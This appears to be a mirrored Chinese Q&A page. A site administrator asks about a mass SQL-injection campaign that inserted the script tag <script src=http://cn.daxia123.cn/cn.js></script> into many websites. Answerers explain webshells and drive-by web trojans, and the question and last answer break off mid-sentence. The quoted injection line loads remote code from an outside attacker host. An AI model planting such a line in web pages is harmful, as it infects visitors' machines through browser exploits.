UC知道daxia123.cn到底是什么网站?
来源:百度知道 编辑:UC知道 时间:2024/05/23 20:44:06
到底是什么人在搞这次攻击?
到底他们的目的是什么?
网络上有数以万计的网站已经被入侵,但是这次攻击造成的破坏并不大,仅仅是有的页面不能正常显示而已。
所以我百思不得其解,他们这次行动的目的究竟是为什么?
如果是搞破坏,它完全可以把数据全部删除,但是它仅仅只是加了一句代码<script src=http://cn.daxia123.cn/cn.js></script>;
如果是要靠这段代码来提高自己网站的流量,这个网站又打不开;
如果只是为了见证一下这个攻击方法的效果,那么效果已经很明显了,但是它仍旧没有停手;
如果是为了提高域名的知名度,那也只是个臭名而已,得不偿失;
如果是仅仅为了好玩,玩了这么多天也该玩够了吧?
如果、我仅仅只是说“如果”,我不敢相信这种可能性会超过万分之一:如果它是为了学雷锋,提醒这些网站做好防注入攻击的工作,又不想留名,那么为什么会用这个真实的域名?
实在是搞不懂它在搞什么,哪位知情人可以透露一二?
感谢大家的热心回答,尤其是要对北京国安2的辛勤付出表示由衷的感激!
但是可能我说的还是不太明白,大家在百度里搜一下“<script src=http://cn.daxia123.cn/cn.js></script>”就可以发现,这是一个大规模的攻击行为,数以万计的网站已经被入侵,并不是只有我一个。
关于IP来自韩国,用代理我当然知道,但是绝大部分IP都是来自韩国,就算使用代理,为什么只用韩国的代理?而不用其他国家的?
再有,这次攻击并不是改写网页文件,而是改写
听我细细给你到来!!!!! 我讨厌复制那种回答,就一点一点打字吧!(唉,累呀)
听你的语气,你应该是个网站管理员吧。 我个人感觉,你的网站被注入以后被黑客拿下了WEBSHELL, 他在你的好多页面加的这段代码,正式他的网马所在地址。 也就是说,你的网站的多个页面都被黑客挂马了。DO YOU 明白?
再说说这个域名打不开的原因。 大家看看他的域名,只是一个二级域名,估计是他自己花几十块钱买的,或免费申请的。为的就是用来进行网页挂马。如果他在自己的网站上挂的话,肉鸡肯定少,也许因为你的网站流量比他这个网站大,所以它在你那里添加了一些代码。进行跳转,跳转地址就是那个网址。看看后边的最后的连接是JS,不出意外的话,就是一个网页木马。(本人小黑,所以对网页挂马制作比较了解)
你也知道,网页挂马都是利用系统漏洞或第三方软件漏洞才能执行次恶意代码,如果系统和软件都没有漏洞的话,是不能执行的。比如说,同样一个被挂了木马的网站,如果我电脑有漏洞,我一打开此网站连接就会显示此网站页面同时就会中病毒,而你电脑没漏洞,你打开却一点事没有,甚至什么东西都不显示。
PS:本人非知情人士,只是自己的分析。 我说的对不对也不知道,你觉得呢??
还有,你看的那个IP地址来自韩国,晕,你还真信呀。现在哪个黑客不知道隐藏自己呀,每次进后台谁都知道会被记录IP,所以黑客现在都用代理。
个人建议:你的网站存在SQL注入这中漏洞,还是尽早补上吧,这个漏洞,随便一个黑客的小菜鸟10分钟也能进你后台。但是至于怎么防范,我就不懂了。我只懂攻,不懂防。呵呵
最后,希望我的回答你能满意。
我刚才到百度上看了看,看来受到攻击的网站还不少。
我觉得像这种攻击,短期内的大范围的攻击,你觉得会仅仅是个人所为吗?一个人有这么多经历和时间吗?如果是某个组织所为的话,我估计某个组织也不会无聊的做这种事情。而且据现在我们了解的情况,他们入侵后并没有对他们有什么利益可言。
你也说到了,IP基本上都是韩国的,所以肯定基本上就是一个人所为。但是如果是一个人他在短期内入侵这么多网站又有点不可思议。所以我能想到的只有一种可能了。就是你网站所用的那套系统也是从这套程序的官方